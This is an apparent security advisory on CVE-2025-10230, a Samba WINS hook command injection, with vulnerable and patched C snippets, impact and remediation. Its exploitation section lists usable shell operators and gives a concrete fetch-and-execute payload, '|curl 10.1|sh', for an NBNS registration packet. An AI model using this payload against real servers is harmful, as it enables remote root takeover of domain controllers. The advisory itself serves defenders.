CVE-2025-10230: Samba Active Directory Domain Controller WINS Server Hook Command Injection

Samba is an open-source implementation of the Server Message Block (SMB) networking protocol, which provides file and print services for Microsoft Windows clients. When configured as an Active Directory Domain Controller (AD DC) with Windows Internet Name Service (WINS) support enabled, Samba resolves NetBIOS names for legacy Windows clients. This system relies on NetBIOS Name Service (NBNS) packets to process registrations, queries, and releases.

CVE-2025-10230 represents an OS command injection vulnerability within the WINS server implementation of Samba. The flaw resides in the handling of the optional wins hook parameter configured in the global section of the Samba configuration file (smb.conf). This parameter specifies an external command or script that Samba executes when WINS events occur, passing the registered NetBIOS name as an argument.

An unauthenticated, remote network attacker can exploit this flaw by sending a specially crafted NBNS Name Registration Request packet to a vulnerable Samba instance on UDP port 137. By inserting shell metacharacters into the NetBIOS name field, the attacker can force the host system to execute arbitrary commands. These commands execute with the elevated privileges of the Samba daemon, which typically runs as root or system.

The root cause of CVE-2025-10230 is the improper neutralization of special elements in the NetBIOS name string prior to passing it to a system shell interpreter. When WINS support is enabled (wins support = yes), the NetBIOS Name Service (nmbd or samba process) handles registrations. If a wins hook script is configured, Samba executes it dynamically to log or process registration changes.

To invoke the script, Samba constructs a shell command line string and executes it using an internal command runner helper, typically smbrun. This helper invokes the shell (such as /bin/sh -c) to run the configured command. Samba attempts to pass the extracted NetBIOS name directly as a command-line argument to the script, but it performs this action via simple string concatenation instead of safe argument passing.

Because the NetBIOS name string is parsed directly from the incoming UDP packet, it constitutes untrusted user input. Samba fails to validate, sanitize, or escape shell metacharacters present in the name before concatenation. When the shell parses the final concatenated command line, it interprets any injected shell operators as instruction separators or subshell execution commands, leading to arbitrary command execution.

The vulnerable code path involves the extraction of the NetBIOS name from the NBNS packet structure and its direct format mapping into the hook command string. In affected versions of Samba, the name formatting operates without proper shell escaping. The snippet below highlights the structural difference between direct concatenation and sanitized execution.

/* Vulnerable execution flow */
char *cmd = NULL;
// NetBIOS name is formatted directly into command string without sanitation
asprintf(&cmd, "%s %s %s %s %d", wins_hook, operation, nb_name, ip_addr, ttl);
// smbrun executes the command string via shell execution (/bin/sh -c)
smbrun(cmd, NULL);

The security patches introduced in updated Samba versions correct this issue by applying dedicated sanitization to the NetBIOS name parameter. By escaping shell metacharacters prior to command formatting, the system prevents the shell interpreter from executing injected commands. Alternatively, modern safe parameters rely on executive helper APIs that do not invoke a command-line shell.

/* Patched execution flow showing sanitization */
char *escaped_name = shell_escape_string(nb_name);
if (escaped_name == NULL) {
    return;
}
// The escaped name is safely formatted into the command string
asprintf(&cmd, "%s %s %s %s %d", wins_hook, operation, escaped_name, ip_addr, ttl);
smbrun(cmd, NULL);
SAFE_FREE(escaped_name);

Exploitation of CVE-2025-10230 is constrained by the design limits of the NetBIOS protocol and Samba's input parsing. A standard NetBIOS name is strictly limited to 15 characters of user-defined data. This small payload window requires attackers to use concise payloads to achieve remote command execution or to leverage multi-stage execution techniques.

Furthermore, the NetBIOS name parser within Samba blocks or rejects packets containing specific metacharacters such as <, >, and ;. Attackers must avoid these restricted characters and instead use other shell operators to chain and execute commands. Operators like pipes (|), ampersands (&), backticks (`), and subshell operators ($()) remain viable within the parsing logic.

To execute the payload, an attacker constructs a NetBIOS Name Registration Request (Opcode 0xF) packet containing the payload in the NetBIOS name field. For example, the payload |curl 10.1|sh fits within the 15-character limit. When sent to the target server on UDP port 137, Samba parses the packet, matches the multi-home registration request, and invokes the wins hook script with the payload, prompting the server to fetch and execute an external script.

The impact of successful exploitation is critical, as represented by the CVSS score of 10.0. An unauthenticated remote attacker can execute arbitrary commands on the host operating system. Because the Samba daemon must run with high privileges to manage network sockets and domain controller assets, the injected commands execute as the root or SYSTEM user.

Compromising a Samba Active Directory Domain Controller yields total control over the domain's Identity and Access Management (IAM) infrastructure. An attacker who gains root access on a Domain Controller can extract password hashes, modify domain policies, establish persistent backdoors, and pivot to any other joined system within the directory service network.

The CVSS vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H confirms that the attack requires low complexity, no local privileges, and no user interaction. The Scope: Changed component highlights that the breach of the Samba process directly leads to the complete compromise of the underlying operating system and the associated Active Directory domain environment.

The primary and recommended remediation is to apply the official security updates released by Samba. Administrators must upgrade their installations to version 4.23.2, 4.22.5, or 4.21.9 or later. These versions incorporate security controls that escape the NetBIOS name parameter before executing external hooks.

If immediate patching is not feasible, administrators can implement effective workarounds by modifying the Samba configuration file (smb.conf). The first option is to disable legacy WINS name resolution support entirely by setting wins support = no in the global configuration section and restarting the service.

The second option is to disable the wins hook functionality if WINS resolution is still required. Commenting out or deleting the wins hook parameter from the global settings prevents Samba from invoking external shell scripts during WINS events, neutralizing the injection vector without disabling WINS itself.